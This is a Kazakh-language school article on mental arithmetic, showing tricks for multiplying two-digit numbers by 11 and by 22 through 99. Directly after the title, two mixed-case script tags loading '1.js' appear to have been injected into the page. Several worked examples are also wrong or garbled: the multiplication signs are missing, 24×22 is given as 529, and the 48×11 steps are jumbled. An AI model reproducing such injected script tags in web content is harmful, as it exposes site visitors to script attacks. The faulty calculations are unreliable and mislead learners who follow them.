Ауызша есептеу – ойдың гимнастикасы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.04.2021

   Натурал сандарды көбейтудің төмендегі тәсілдерін меңгеру, оқушылардың арфиметикалық амалдарды тез орындалуға, есте сақтау қабілеттерін дамытуға, математикалық ойлау мәдениетін арттыруға көмектеседі.

Ойда есептеу, есептеудің ең оңай және көне түрі болып табылады. Ауызша есептеу, тез ойша есептеуге ғана мүмкіндік беріп қоймай, бақылау, бағалау, есептеу барысындағы қатені түзетуге мүмкіндік береді. Қолда қолданылатын кесте мен есептеу машинасы болмаған жағдайда, ауызша есептеу тәсілдерін меңгеру маңызды.

Натурал сандарды көбейту.

11-ге көбейту

Екіорынды сандардың цифраларының қосындысы 10-нан артпаған жағдайда 11-ге көбейту үшін, сол санның цифраларының ортасына цифраларының қосындысын қою қажет:

72 11=7(7+2)2=792

  35 11=3(3+5)5=385

Егер цифраларының қосындысы 10-ға немесе 10-нан үлкен болған жағдайда, алдындағы ереже бойынша ортасына цифрларының қосындысын қойып, бірінші санға бірді қосып, соңғы сандарды өзгеріссіз жазамыз.

Мысалы:

94 11= 9(9+4)4= 9(13)4= (9+1)34=1034

48 11= 49(4+8)8= 4(12)8= (4+10)28=528

89 11= 8(8+9)9= 8(17)9= (8+1)79= 979

22, 33, ... , 99 сандарына көбейту.

Екі орынды сандарды 22,33, ... , 99 көбейту үшін, көбейткішті бірорынды санмен (2 мен 9аралығы) 11-дің көбейтіндісі түрінде келтіреміз.

Мысылы: 44= 4 11; 55= 5 11

Содан кейін алдыңғы 11-ге көбейту ережесін қолданамыз.

24 22= 24 2 11= 48 11= 529

23 33= 23 3 11= 69 11= 759

18 44= 18 4 11= 72 11=792

Тағы басқа, бірдей уақытта бірінші көбейткішті өсіріп және екіншісін кеміту заңын қолдауға болады.

28 33= (28 3)  (33:3)= 84 11= 924

48 22= (48 2) (22:2)= 96 11= 1056

Сейдахметова Р. К.

Просмотров: 705


Пікір қосу



Деректерді қолтаңбаға қосу